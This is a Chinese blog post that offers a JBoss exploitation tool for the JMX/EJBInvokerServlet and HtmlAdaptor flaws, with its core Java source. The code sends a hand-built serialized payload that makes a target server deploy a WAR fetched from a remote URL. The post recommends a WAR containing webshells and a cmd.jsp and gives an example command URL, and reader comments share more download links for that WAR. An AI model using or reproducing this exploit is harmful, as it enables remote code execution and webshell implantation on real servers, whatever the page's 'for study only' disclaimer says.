Jboss JMX/EJBInvokerServlet、HtmlAdaptor漏洞利用工具

yzmm
2230 阅读
免责声明:本站提供的所有工具及代码仅供交流学习,不得用于商业或黑客行为。
下载地址:Jboss漏洞利用工具.jar 链接:  密码: ucdl 功能说明:
安装jdk并配置好环境变量,然后填好参数先点获取即可,成功后会返回"请求成功."。
1、JMX/EJBInvokerServlet:
	host写IP或域名:127.0.0.1/p2j.cn
	port必填,如:8080
2、HtmlAdaptor:
	host写URL地址:http://localhost:8080
	port不需填写
3、war包推荐使用:http://javaweb.org/is.war,is.war里面带有几个版本的一句话和一个cmd.jsp
(如:http://xxx.com/is/?cmd.jsp?pwd=023&cmd=ls)如果使用自己的war包,
cmd功能需要默认配置(/is/cmd.jsp)war包只自带了mysql数据库所需要的jar,
连接oracle等其他数据库需要自己添加jar包

截图-JMX/EJBInvokerServlet:

1

截图-HtmlAdaptor:

核心源码:

package org.javaweb.jboss;
import java.io.BufferedReader;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.InetSocketAddress;
import java.net.URL;
import java.nio.ByteBuffer;
import java.nio.channels.SocketChannel;
import java.util.ArrayList;
import java.util.List;
public class Test {
	byte[] a1 = new byte[]{
		(byte) 0xac,(byte) 0xed,0x00,0x05,0x73,0x72,0x00,0x29,0x6f,0x72,0x67,0x2e,0x6a,0x62,0x6f,0x73, 								// ....sr.) org.jbos
		0x73,0x2e,0x69,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x4d,0x61,0x72, 											// s.invoca tion.Mar
		0x73,0x68,0x61,0x6c,0x6c,0x65,0x64,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,											// shalledI nvocatio
		0x6e,(byte) 0xf6,0x06,(byte) 0x95,0x27,0x41,0x3e,(byte) 0xa4,(byte) 0xbe,0x0c,0x00,0x00,0x78,0x70,0x70,0x77,				// n...'A>. ....xppw
		0x08,0x78,(byte) 0x94,(byte) 0x98,0x47,(byte) 0xc1,(byte) 0xd0,0x53,(byte) 0x87,0x73,0x72,0x00,0x11,0x6a,0x61,0x76,			// .x..G..S .sr..jav
		0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x49,0x6e,0x74,0x65,0x67,0x65,0x72,0x12,(byte) 0xe2,										// a.lang.I nteger..
		(byte) 0xa0,(byte) 0xa4,(byte) 0xf7,(byte) 0x81,(byte) 0x87,0x38,0x02,0x00,0x01,0x49,0x00,0x05,0x76,0x61,0x6c,0x75,			// .....8.. .I..valu
		0x65,0x78,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4e,											// exr..jav a.lang.N
		0x75,0x6d,0x62,0x65,0x72,(byte) 0x86,(byte) 0xac,(byte) 0x95,0x1d,0x0b,(byte) 0x94,(byte) 0xe0,(byte) 0x8b,0x02,0x00,0x00,	// umber... ........
		0x78,0x70,0x26,(byte) 0x95,(byte) 0xbe,0x0a,0x73,0x72,0x00,0x24,0x6f,0x72,0x67,0x2e,0x6a,0x62,								// xp&...sr .$org.jb
		0x6f,0x73,0x73,0x2e,0x69,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x4d,											// oss.invo cation.M
		0x61,0x72,0x73,0x68,0x61,0x6c,0x6c,0x65,0x64,0x56,0x61,0x6c,0x75,0x65,(byte) 0xea,(byte) 0xcc,								// arshalle dValue..
		(byte) 0xe0,(byte) 0xd1,(byte) 0xf4,0x4a,(byte) 0xd0,(byte) 0x99,0x0c,0x00,0x00,0x78,0x70,0x77
	};
	byte[] aa = new byte[]{(byte) 0xeb,0x0,0x0,0x0,(byte) 0xe3};
	byte[] ab = new byte[]{0x0,0x15};
	byte[] a2 = new byte[]{
		(byte) 0xac,(byte) 0xed,0x00,0x05,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,									// .....ur. .[Ljava.
		0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,(byte) 0x90,(byte) 0xce,0x58,(byte) 0x9f,						// lang.Obj ect;..X.
		0x10,0x73,0x29,0x6c,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x04,0x73,0x72,0x00,											// .s)l...x p....sr.
		0x1b,0x6a,0x61,0x76,0x61,0x78,0x2e,0x6d,0x61,0x6e,0x61,0x67,0x65,0x6d,0x65,0x6e,											// .javax.m anagemen
		0x74,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x4e,0x61,0x6d,0x65,0x0f,0x03,(byte) 0xa7,0x1b,										// t.Object Name....
		(byte) 0xeb,0x6d,0x15,(byte) 0xcf,0x03,0x00,0x00,0x78,0x70,0x74,0x00,0x21,0x6a,0x62,0x6f,0x73,								// .m.....x pt.!jbos
		0x73,0x2e,0x73,0x79,0x73,0x74,0x65,0x6d,0x3a,0x73,0x65,0x72,0x76,0x69,0x63,0x65,											// s.system :service
		0x3d,0x4d,0x61,0x69,0x6e,0x44,0x65,0x70,0x6c,0x6f,0x79,0x65,0x72,0x78,0x74,0x00,											// =MainDep loyerxt.
		0x06,0x64,0x65,0x70,0x6c,0x6f,0x79,0x75,0x71,0x00,0x7e,0x00,0x00,0x00,0x00,0x00,											// .deployu q.~.....
		0x01,0x74
	};
	byte[] a3 = new byte[]{
		0x75,0x72,0x00,
		0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,																			// ur..[ Ljava.la
		0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,(byte) 0xad,(byte) 0xd2,0x56,(byte) 0xe7,(byte) 0xe9,0x1d,				// ng.Strin g;..V...
		0x7b,0x47,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00,0x10,0x6a,0x61,											// {G...xp. ...t..ja
		0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67
	};
	byte[] a4 = new byte[]{
		0x0d,(byte) 0xd3,
		(byte) 0xbe,(byte) 0xc9,0x78,0x77,0x04,0x00,0x00,0x00,0x01,0x73,0x72,0x00,0x22,0x6f,0x72,0x67,								// ..xw.... .sr."org
		0x2e,0x6a,0x62,0x6f,0x73,0x73,0x2e,0x69,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,											// .jboss.i nvocatio
		0x6e,0x2e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x4b,0x65,0x79,(byte) 0xb8,										// n.Invoca tionKey.
		(byte) 0xfb,0x72,(byte) 0x84,(byte) 0xd7,(byte) 0x93,(byte) 0x85,(byte) 0xf9,0x02,0x00,0x01,0x49,0x00,0x07,0x6f,0x72,0x64,	// .r...... ..I..ord
		0x69,0x6e,0x61,0x6c,0x78,0x70,0x00,0x00,0x00,0x05,0x73,0x71,0x00,0x7e,0x00,0x05,											// inalxp.. ..sq.~..
		0x77,0x0d,0x00,0x00,0x00,0x05,(byte) 0xac,(byte) 0xed,0x00,0x05,0x70,(byte) 0xfb,0x57,(byte) 0xa7,(byte) 0xaa,0x78,			// w....... ..p.W..x
		0x77,0x04,0x00,0x00,0x00,0x03,0x73,0x71,0x00,0x7e,0x00,0x07,0x00,0x00,0x00,0x04,											// w.....sq .~......
		0x73,0x72,0x00,0x23,0x6f,0x72,0x67,0x2e,0x6a,0x62,0x6f,0x73,0x73,0x2e,0x69,0x6e,											// sr.#org. jboss.in
		0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,											// vocation .Invocat
		0x69,0x6f,0x6e,0x54,0x79,0x70,0x65,0x59,(byte) 0xa7,0x3a,0x1c,(byte) 0xa5,0x2b,0x7c,(byte) 0xbf,0x02,						// ionTypeY .:..+|..
		0x00,0x01,0x49,0x00,0x07,0x6f,0x72,0x64,0x69,0x6e,0x61,0x6c,0x78,0x70,0x00,0x00,											// ..I..ord inalxp..
		0x00,0x01,0x73,0x71,0x00,0x7e,0x00,0x07,0x00,0x00,0x00,0x0a,0x70,0x74,0x00,0x0f,											// ..sq.~.. ....pt..
		0x4a,0x4d,0x58,0x5f,0x4f,0x42,0x4a,0x45,0x43,0x54,0x5f,0x4e,0x41,0x4d,0x45,0x73,											// JMX_OBJE CT_NAMEs
		0x72,0x00,0x1b,0x6a,0x61,0x76,0x61,0x78,0x2e,0x6d,0x61,0x6e,0x61,0x67,0x65,0x6d,											// r..javax .managem
		0x65,0x6e,0x74,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x4e,0x61,0x6d,0x65,0x0f,0x03,											// ent.Obje ctName..
		(byte) 0xa7,0x1b,(byte) 0xeb,0x6d,0x15,(byte) 0xcf,0x03,0x00,0x00,0x78,0x70,0x74,0x00,0x21,0x6a,0x62,						// ...m.... .xpt.!jb
		0x6f,0x73,0x73,0x2e,0x73,0x79,0x73,0x74,0x65,0x6d,0x3a,0x73,0x65,0x72,0x76,0x69,											// oss.syst em:servi
		0x63,0x65,0x3d,0x4d,0x61,0x69,0x6e,0x44,0x65,0x70,0x6c,0x6f,0x79,0x65,0x72,0x78,											// ce=MainD eployerx
		0x78
	};
	public void send(String host,int port,byte[] requestData) throws Exception {
		try {
			SocketChannel socketChannel = SocketChannel.open();
			socketChannel.socket().connect(new InetSocketAddress(host,port),5000);
			socketChannel.configureBlocking(false);
			ByteBuffer byteBuffer = ByteBuffer.allocate(512);
			socketChannel.write(ByteBuffer.wrap(requestData));
			while (true) {
				byteBuffer.clear();
				int readBytes = socketChannel.read(byteBuffer);
				if (readBytes > 0) {
					byteBuffer.flip();
					socketChannel.close();
					break;
				}
			}
		} catch (IOException e) {
			throw e;
		}
	}
	protected void addByte(List<Byte> ls,byte[] b){
		for(byte bb:b){
			ls.add(bb);
		}
	}
	protected byte[] toByteArray(Byte[] b){
		ByteArrayOutputStream bos = new ByteArrayOutputStream();
		for(byte bs:b){
			bos.write(bs);
		}
		return bos.toByteArray();
	}
	public String request(String url) throws Exception{
    	String str = "",tmp;
    	BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
		while((tmp=br.readLine())!=null){
			str+=tmp+"\r\n";
		}
		return str;
	}
	public void testEJBInvokerServlet(String host,int port,String war) throws Exception{
		List<Byte> ls = new ArrayList<Byte>();
		addByte(ls, a1);
		addByte(ls,aa);
		addByte(ls, a2);
		addByte(ls, ab);
		addByte(ls, war.getBytes());
		addByte(ls, a3);
		addByte(ls, a4);
		byte[] b = toByteArray(ls.toArray(new Byte[ls.size()]));
		String req = "POST /invoker/EJBInvokerServlet/ HTTP/1.1\r\n"+
				"ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation\r\n"+
				"Accept-Encoding: x-gzip,x-deflate,gzip,deflate\r\n"+
				"User-Agent: Java/1.6.0_21\r\n"+
				"Host: "+host+":"+port+"\r\n"+
				"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n"+
				"Connection: keep-alive\r\n"+
				"Content-type: application/x-www-form-urlencoded\r\n"+
				"Content-Length: "+b.length+"\r\n\r\n";
		ls.clear();
		addByte(ls, req.getBytes());
		addByte(ls, b);
		send(host,port,toByteArray(ls.toArray(new Byte[ls.size()])));
	}
}

评论 (13)

大龄菜b
园长MM,问一下这个漏洞j是不是jboss 6以及更高版本都不能利用吧
yzmm
6测试的时候可以,以上肯定不行。
小菜
可以百度云,或者稳定连接共享下is.war吗?
yzmm
<a href="http://pan.baidu.com/s/1EKwVm" rel="nofollow">iswin.war</a>
请教
楼主,为什么我按图中填写参数后在jboss目录无法下载到is.war呢,是我的使用方法不对吗,请指教,谢谢。
yzmm
经常换服务器jar可能有的时候访问不到哦
过客
园长可以把is.war,这个文件共享一下吗?
yzmm
http://ahack.net/is.war
我不告诉你
园长,你这么牛B 你老婆知道不

发表评论